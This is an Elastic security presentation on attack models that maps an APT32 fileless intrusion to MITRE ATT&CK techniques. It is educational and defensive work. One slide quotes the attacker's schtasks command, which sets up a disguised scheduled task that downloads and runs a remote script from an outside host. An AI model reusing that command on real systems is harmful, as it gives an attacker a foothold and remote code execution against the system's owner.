Presenter: Patrick Tierney
Date: June 24, 2020
Upgrade Your Attack Model: Finding and Stopping Fileless Attacks with MITRE ATT&CK
About Me
Patrick Tierney
Principal Solutions Architect
patrick.tierney@elastic.co
▪ 20 years in the security industry in IT operations and sales
▪ Internet Security Systems/IBM 1998 and Endgame/Elastic (2010)
▪ Nerd credentials: I have 1500 comic books next to my desk right now
What Is An Attack Model and What Does It Do?
Attack Models capture information used to think like an attacker: threat modeling, abuse case development and refinement, data classification, and technology-specific attack patterns.
Building Security In Maturity Model
https://www.bsimm.com/about.html
A Brief History of Attack Models
Sorry, Stephen
Diamond Security Model
● Looks simplistic, but can still be used to define complex attacks
● Includes the motivational factor of the attacker.
● Fully defined in a whitepaper here: https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
Diamond Security Model
● Mapping the Attack on the Deathstar
Cyber Attack Lifecycle
● Developed by Mandiant
● Defines the cycle involved in dwell time
● Defines a completed mission, but I don’t think an attacker thinks that way
APT 39 Mapped to Cyber Attack Lifecycle
Cyber Kill Chain™
● Developed by Lockheed
● Defines 7 steps of an attack
● Probably the most common attack definition
NIST Security Framework
● 5 columns (or Simon buttons, in the newer version)
● Created in response to Obama executive order
● Really more of a risk guideline framework than a model
● Only model to identify a recovery step
So, what’s the problem with those?
MITRE ATT&CK
A More Complete Model for Today’s Threats
● Adversarial Tactics, Techniques & Common Knowledge
● Federally funded, non-profit organization
● Open source framework
● Over 300 attacker techniques identified
● Multiple OS coverage
● Malware is only part of the story
● Tests enterprise solutions
● Evaluate the raw test data for yourself:
https://www.elastic.co/blog/visualizing-mitre-round-2-evaluation-results-Kibana
If You Don’t Know What You’re Looking For, How Will You Ever Find It?
Demo Time!
Using the Matrix for fun and profit education
APT32 In-Memory ATTACK
Let’s Walk Through an Example
T1193  Spearphishing Attachment
Phishing message with malicious document delivered through email
T1036  Masquerading
Masquerading as a legitimate Windows process
T1053  Scheduled Task
Persistence via scheduled task
T1064  Scripting
Malicious script execution from scheduled task
T1055  Process Injection
Process injection to gain code execution
T1094  Custom Command and Control
Command and control using Cobalt Strike
ATT&CK MAPPING
Techniques used in APT32 attack
Technique ID: T1193  Spearphishing Attachment
Phishing message with malicious document delivered through email.
Technique ID: T1193  Spearphishing Attachment
The attacker is counting on the end user to enable content for the document. And they often do.
Technique ID: T1036  Masquerading
The first stage of the attack is to drop some files in C:\ProgramData. But ying.exe is actually wscript.exe.
Technique ID: T1053  Scheduled Task
The malicious document launches a scheduled task for persistence.
schtasks /create /sc MINUTE /tn "GoogleUpdateTasksMachineCore" /tr ""C:\ProgramData\YING.exe" //E:vbscript /b C:\ProgramData\YANG.txt localhost "sc"r"i"p"t:https://steam.learning-api.com/ib.jpg" /mo 11 /F
Technique ID: T1064  Scripting From A Scheduled Task
The ying.exe process loads in-memory .NET binaries, loader.dll and scrobj.dll.
Technique ID: T1055  Process Injection
The ying.exe process injects code into its own process (which is really wscript) to insert instructions for contacting the command and control server.
Technique ID: T1094  Custom Command and Control
And now that it has its instructions, YING.exe reaches out to its control server, in this case to download a Cobalt Strike payload.
T1193  Spearphishing Attachment
Phishing message with malicious document delivered through email
T1036  Masquerading
Masquerading as a legitimate Windows process
T1053  Scheduled Task
Persistence via scheduled task
T1064  Scripting
Malicious script execution from scheduled task
T1055  Process Injection
Process injection to gain code execution
T1094  Custom Command and Control
Command and control using Cobalt Strike
ATT&CK MAPPING
Techniques used in APT32 attack
How do I know if I’m protected?
Now Elastic!
Website: https://atomicredteam.io/
Twitter: @redcanaryco
GitHub: https://github.com/redcanaryco/atomic-red-team
Free and open-sourced PowerShell scripts to test your defenses against dozens of MITRE techniques.
Website: https://attackiq.com/
Twitter: @attackiq
Commercial software to automate MITRE based red team exercises
Security how it should be: open
Elastic Security integrates endpoint security and SIEM to give you prevention, collection, detection, and response capabilities for unified protection across your infrastructure.
ELASTIC SECURITY
www.elastic.co
Search - Observe - Protect
Thank You
Endpoint SIEM
Elastic Security

More Related Content

What's hot

Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactTom Eston
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Cyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeCyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeF-Secure Corporation
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hackingAbhinav Mishra
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template InjectionVandana Verma
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2F-Secure Corporation
 

What's hot (9)

Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Cyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat LandscapeCyber security webinar part 1 - Threat Landscape
Cyber security webinar part 1 - Threat Landscape
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hacking
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template Injection
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
 

Similar to Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
Login cat tekmonks - v4
Login cat   tekmonks - v4Login cat   tekmonks - v4
Login cat tekmonks - v4TEKMONKS
 
Login cat tekmonks - v4
Login cat   tekmonks - v4Login cat   tekmonks - v4
Login cat tekmonks - v4Rohit Kapoor
 
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & MicrosoftCCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & Microsoftwalk2talk srl
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
 Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...ITCamp
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themTudor Damian
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scaleOWASP
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceJesse Nebling
 
Product security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsProduct security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsLabSharegroup
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerGFI Software
 
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)ITCamp
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)setuid0
 
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunk
 

Similar to Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK (20)

AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
 
IT Security for Nonprofits
IT Security for NonprofitsIT Security for Nonprofits
IT Security for Nonprofits
 
Azure Sentinel
Azure SentinelAzure Sentinel
Azure Sentinel
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
Login cat tekmonks - v4
Login cat   tekmonks - v4Login cat   tekmonks - v4
Login cat tekmonks - v4
 
Login cat tekmonks - v4
Login cat   tekmonks - v4Login cat   tekmonks - v4
Login cat tekmonks - v4
 
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & MicrosoftCCI2018 - La "moderna" Sicurezza informatica & Microsoft
CCI2018 - La "moderna" Sicurezza informatica & Microsoft
 
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
 Modern cybersecurity threats, and shiny new tools to help deal with them - T... Modern cybersecurity threats, and shiny new tools to help deal with them - T...
Modern cybersecurity threats, and shiny new tools to help deal with them - T...
 
Modern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with themModern cybersecurity threats, and shiny new tools to help deal with them
Modern cybersecurity threats, and shiny new tools to help deal with them
 
Security Awareness Training by Fortinet
Security Awareness Training by FortinetSecurity Awareness Training by Fortinet
Security Awareness Training by Fortinet
 
Attack eu 2021 attack4cvc
Attack eu 2021 attack4cvcAttack eu 2021 attack4cvc
Attack eu 2021 attack4cvc
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale
 
Ht r32
Ht r32Ht r32
Ht r32
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing Experience
 
Product security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security CertsProduct security by Blockchain, AI and Security Certs
Product security by Blockchain, AI and Security Certs
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
 
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Allegory of the cave(1)
Allegory of the cave(1)Allegory of the cave(1)
Allegory of the cave(1)
 
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia InsuranceSplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
SplunkLive! Zurich 2018: The Evolution of Splunk at Helvetia Insurance
 

More from FaithWestdorp

Using Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchUsing Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchFaithWestdorp
 
Observability from the Home
Observability from the HomeObservability from the Home
Observability from the HomeFaithWestdorp
 
Elasticsearch Goes to Congress
Elasticsearch Goes to CongressElasticsearch Goes to Congress
Elasticsearch Goes to CongressFaithWestdorp
 
Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology   ray myers - 11-5-2020Eliminate your zombie technology   ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020FaithWestdorp
 
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchMejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchFaithWestdorp
 
Evolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningEvolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningFaithWestdorp
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Examining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchExamining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchFaithWestdorp
 
From the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFrom the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFaithWestdorp
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreFaithWestdorp
 
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action  or how i built a cli tool...Elasticsearch's aggregations & esctl in action  or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...FaithWestdorp
 
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
 Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex... Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...FaithWestdorp
 
Introduction to machine learning using Elastic
Introduction to machine learning using ElasticIntroduction to machine learning using Elastic
Introduction to machine learning using ElasticFaithWestdorp
 
Elastic Observability
Elastic Observability Elastic Observability
Elastic Observability FaithWestdorp
 
Threat hunting with Elastic APM
Threat hunting with Elastic APMThreat hunting with Elastic APM
Threat hunting with Elastic APMFaithWestdorp
 
Guide to Data Visualization in Kibana
Guide to Data Visualization in KibanaGuide to Data Visualization in Kibana
Guide to Data Visualization in KibanaFaithWestdorp
 
Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...FaithWestdorp
 
Esctl in action elastic user group presentation aug 25 2020
Esctl in action   elastic user group presentation aug 25 2020Esctl in action   elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020FaithWestdorp
 

More from FaithWestdorp (18)

Using Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor searchUsing Elastiknn for exact and approximate nearest neighbor search
Using Elastiknn for exact and approximate nearest neighbor search
 
Observability from the Home
Observability from the HomeObservability from the Home
Observability from the Home
 
Elasticsearch Goes to Congress
Elasticsearch Goes to CongressElasticsearch Goes to Congress
Elasticsearch Goes to Congress
 
Eliminate your zombie technology ray myers - 11-5-2020
Eliminate your zombie technology   ray myers - 11-5-2020Eliminate your zombie technology   ray myers - 11-5-2020
Eliminate your zombie technology ray myers - 11-5-2020
 
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearchMejorando las busquedas en nuestras aplicaciones web con elasticsearch
Mejorando las busquedas en nuestras aplicaciones web con elasticsearch
 
Evolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet LearningEvolving with Elastic: GetSet Learning
Evolving with Elastic: GetSet Learning
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
Examining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using ElasticsearchExamining OpenData with a Search Index using Elasticsearch
Examining OpenData with a Search Index using Elasticsearch
 
From the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deploymentFrom the trenches: scaling a large log management deployment
From the trenches: scaling a large log management deployment
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymore
 
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
Elasticsearch's aggregations & esctl in action  or how i built a cli tool...Elasticsearch's aggregations & esctl in action  or how i built a cli tool...
Elasticsearch's aggregations & esctl in action or how i built a cli tool...
 
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
 Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex... Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
Searching for NLP: Using Elasticsearch to Create MVPs of NLP-enabled User Ex...
 
Introduction to machine learning using Elastic
Introduction to machine learning using ElasticIntroduction to machine learning using Elastic
Introduction to machine learning using Elastic
 
Elastic Observability
Elastic Observability Elastic Observability
Elastic Observability
 
Threat hunting with Elastic APM
Threat hunting with Elastic APMThreat hunting with Elastic APM
Threat hunting with Elastic APM
 
Guide to Data Visualization in Kibana
Guide to Data Visualization in KibanaGuide to Data Visualization in Kibana
Guide to Data Visualization in Kibana
 
Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...Elastic's recommendation on keeping services up and running with real-time vi...
Elastic's recommendation on keeping services up and running with real-time vi...
 
Esctl in action elastic user group presentation aug 25 2020
Esctl in action   elastic user group presentation aug 25 2020Esctl in action   elastic user group presentation aug 25 2020
Esctl in action elastic user group presentation aug 25 2020
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

Upgrade your attack model: finding and stopping fileless attacks with MITRE ATT&CK

  • 1. Presenter: Patrick Tierney Date: June 24, 2020 Upgrade Your Attack Model: Finding and Stopping Fileless Attacks with MITRE ATT&CK
  • 2. About Me
    Patrick Tierney, Principal Solutions Architect, patrick.tierney@elastic.co
    ▪ 20 years in the security industry in IT operations and sales
    ▪ Internet Security Systems/IBM (1998) and Endgame/Elastic (2010)
    ▪ Nerd credentials: I have 1500 comic books next to my desk right now
  • 3. What Is An Attack Model and What Does It Do?
  • 4. Attack Models capture information used to think like an attacker: threat modeling, abuse case development and refinement, data classification, and technology-specific attack patterns.
    Building Security In Maturity Model, https://www.bsimm.com/about.html
  • 5. A Brief History of Attack Models Sorry, Stephen
  • 6. Diamond Security Model
    ● Looks simplistic, but can still be used to define complex attacks
    ● Includes the motivational factor of the attacker.
    ● Fully defined in a whitepaper here: https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
  • 7. Diamond Security Model
    ● Mapping the Attack on the Deathstar
  • 8. Cyber Attack Lifecycle
    ● Developed by Mandiant
    ● Defines the cycle involved in dwell time
    ● Defines a completed mission, but I don’t think an attacker thinks that way
  • 9. APT 39 Mapped to Cyber Attack Lifecycle
  • 10. Cyber Kill Chain™
    ● Developed by Lockheed
    ● Defines 7 steps of an attack
    ● Probably the most common attack definition
  • 11. NIST Security Framework
    ● 5 columns (or Simon buttons, in the newer version)
    ● Created in response to Obama executive order
    ● Really more of a risk guideline framework than a model
    ● Only model to identify a recovery step
  • 12. So, what’s the problem with those?
  • 13. MITRE ATT&CK: A More Complete Model for Today’s Threats
    ● Adversarial Tactics, Techniques & Common Knowledge
    ● Federally funded, non-profit organization
    ● Open source framework
    ● Over 300 attacker techniques identified
    ● Multiple OS coverage
    ● Malware is only part of the story
    ● Tests enterprise solutions
    ● Evaluate the raw test data for yourself: https://www.elastic.co/blog/visualizing-mitre-round-2-evaluation-results-Kibana
  • 15. If You Don’t Know What You’re Looking For, How Will You Ever Find It?
  • 16. Demo Time! Using the Matrix for fun and profit education
  • 17. APT32 In-Memory ATTACK: Let’s Walk Through an Example
  • 18. ATT&CK MAPPING: Techniques used in APT32 attack
    T1193  Spearphishing Attachment: Phishing message with malicious document delivered through email
    T1036  Masquerading: Masquerading as a legitimate Windows process
    T1053  Scheduled Task: Persistence via scheduled task
    T1064  Scripting: Malicious script execution from scheduled task
    T1055  Process Injection: Process injection to gain code execution
    T1094  Custom Command and Control: Command and control using Cobalt Strike
  • 19. Technique ID T1193  Spearphishing Attachment Phishing message with malicious document delivered through email.
  • 20. Technique ID T1193  Spearphishing Attachment The attacker is counting on the end user to enable content for the document. And they often do.
  • 21. Technique ID T1036  Masquerading The first stage of the attack is to drop some files in c:ProgramData. But ying.exe is actually wscript.exe.
  • 22. Technique ID T1053  Scheduled Task The malicious document launches a scheduled task for persistence. schtasks /create /sc MINUTE /tn "GoogleUpdateTasksMachineCore" /tr ""C:ProgramDataYING.exe" //E:vbscript /b C:ProgramDataYANG.txt localhost "sc"r"i"p"t:https://steam.learning-api.com/ib.jpg" /mo 11 /F
  • 23. Technique ID T1064  Scripting From A Scheduled Task. The ying.exe loads an in-memory .NET binaries loader.dll and scrobj.dll
  • 24. Technique ID T1055  Process Injection The ying.exe process injects code into its own process (which is really wscript) to insert instructions for contacting the command and control server.
  • 25. Technique ID T1094  Custom Command and Control And now that it has its instructions, YING.exe reaches out to it’s control server, in this case to download a Cobalt Strike payload.
  • 26. T1193  Spearphishing Attachment Phishing message with malicious document delivered through email T1036  Masquerading Masquerading as a legitimate Windows process T1053  Scheduled Task Persistence via scheduled task T1064  Scripting Malicious script execution from scheduled task T1055  Process Injection Process injection to gain code execution T1094  Custom Command and Control Command and control using Cobalt Strike ATT&CK MAPPING Techniques used in APT32 attack
  • 27. How do I know if I’m protected?
  • 29. Website: https://atomicredteam.io/ Twitter: @redcanaryco GitHub: https://github.com/redcanaryco/atomic-red-team. Free and open-sourced PowerShell scripts to test your defenses against dozens of MITRE techniques.
  • 30. Website: https://attackiq.com/ Twitter: @attackiq. Commercial software to automate MITRE-based red team exercises.
  • 31. Security how it should be: open Elastic Security integrates endpoint security and SIEM to give you prevention, collection, detection, and response capabilities for unified protection across your infrastructure. ELASTIC SECURITY
